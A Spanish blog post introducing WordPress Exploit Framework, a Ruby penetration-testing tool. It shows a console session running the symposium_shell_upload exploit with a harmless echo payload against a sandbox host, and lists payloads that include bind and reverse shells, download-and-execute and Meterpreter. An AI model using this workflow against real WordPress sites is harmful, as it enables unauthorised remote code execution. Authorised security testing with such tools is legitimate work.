WordPress Exploit FrameWork
WPEF o WordPress Exploit FrameWork es una Tool desarrollada en ruby, cual tiene como fin desarrollar o implementar módulos para las pruebas de penetración en sitios web basados en el CMS de WordPress.
Abra una línea de comandos en su terminal en el directorio que ha descargado WordPress Exploit Framework, e iniciarlo ejecutando.
ruby wpxf.rb
Una vez cargado, se le presentará el indicador wpxf, desde aquí puede buscar módulos utilizando el comando de búsqueda o cargar un módulo utilizando el comando use.
Cargar un módulo en su entorno le permitirá establecer opciones con el comando set y ver información sobre el módulo utilizando info.
A continuación se muestra un ejemplo de cómo se podría cargar el módulo de exploit symposium_shell_upload, establecer las opciones de módulo y carga útil y ejecutar el exploit contra el destino.
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
Los módulos auxiliares no permiten ejecutar cargas útiles en la máquina de destino, sino que permiten extraer información del destino, escalar privilegios o proporcionar funcionalidad de denegación de servicio.
Los módulos Exploit requieren que especifique una carga útil que posteriormente se ejecuta en la máquina de destino, lo que le permite ejecutar código arbitrario para extraer información de la máquina, establecer un shell remoto o cualquier otra cosa que desee realizar dentro del contexto del servidor web.
Cargas útiles disponibles:
Bind_php: carga una secuencia de comandos que se enlazará a un puerto específico y permitirá que WPXF establezca una shell remota.
Personalizado: carga y ejecuta un script PHP personalizado.
Descarga_exec: descarga y ejecuta un archivo ejecutable remoto.
Meterpreter_bind_tcp: a Meterpreter enlaza la carga útil TCP generada usando msfvenom.
Meterpreter_reverse_tcp: a Meterpreter reversa TCP carga útil generada usando msfvenom.
Exec: ejecuta un comando shell en el servidor remoto y devuelve la salida a la sesión WPXF.
Reverse_tcp: carga una secuencia de comandos que establecerá un shell TCP inverso.
Todas estas cargas útiles, con la excepción de customlas cargas útiles de Meterpreter, se borrarán después de haber sido ejecutadas, para evitar dejarlas tiradas en la máquina de destino después del uso o en caso de que se utilicen para establecer un shell que falla.
_______________________________________________________
LINKS:
Las guías sobre módulos de escritura y payloads
[ Modulos y payloads ]
Lista de comandos
[ Comandos ]
Descargar Tool
[ WordPress Exploit Framework ]
_______________________________________________________
[ postby: byt3 ] [ RedBird ] [ RedTheam ]
0 Comentarios